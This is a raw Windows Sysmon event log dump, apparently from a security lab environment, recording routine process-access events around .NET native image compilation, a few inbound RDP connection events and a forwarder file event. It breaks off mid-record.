Office\root\Office16\POWERPNT.EXEC:\Users\Administrator\AppData\Local\Microsoft\Office\OTele\powerpnt.exe.db-journalMD5=BDDF7F7FBA496EF2F757B8E36CED193F,SHA256=9CE9792957FD12CAC642214FEEEEE8AF562C8925C4DAF9D155322729628B2230,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000080798Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:47.388{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC27-607E-D40E-00000000BB01}3588C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080797Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:47.372{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC27-607E-D40E-00000000BB01}3588C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080796Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:47.372{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC27-607E-D40E-00000000BB01}3588C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080795Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:47.341{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC27-607E-D30E-00000000BB01}4064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080794Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:47.325{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC27-607E-D30E-00000000BB01}4064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080793Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:47.325{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC27-607E-D30E-00000000BB01}4064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080792Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:47.185{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC27-607E-D20E-00000000BB01}6292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080791Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:47.185{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC27-607E-D20E-00000000BB01}6292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080790Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:47.185{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC27-607E-D20E-00000000BB01}6292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080789Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:47.138{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC27-607E-D10E-00000000BB01}5364C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080788Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:47.122{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC27-607E-D10E-00000000BB01}5364C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080787Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:47.122{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC27-607E-D10E-00000000BB01}5364C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080786Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:47.044{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC27-607E-D00E-00000000BB01}4120C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080785Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:47.028{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC27-607E-D00E-00000000BB01}4120C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080784Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:47.028{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC27-607E-D00E-00000000BB01}4120C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000050589Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:45.939{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-51145-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050588Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:45.823{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-64599-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050587Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:47.283{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0051C501F52F9902750932495D9CA070,SHA256=1DBA475A9246436923340F93347FB1F636340444B6661A1F347D2785C4C2ABF2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000080876Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:48.981{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC28-607E-EB0E-00000000BB01}4828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080875Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:48.981{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC28-607E-EB0E-00000000BB01}4828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080874Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:48.981{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC28-607E-EB0E-00000000BB01}4828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080873Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:48.935{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC28-607E-EA0E-00000000BB01}5540C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080872Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:48.919{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC28-607E-EA0E-00000000BB01}5540C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080871Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:48.919{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC28-607E-EA0E-00000000BB01}5540C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080870Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:48.872{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC28-607E-E90E-00000000BB01}3180C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080869Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 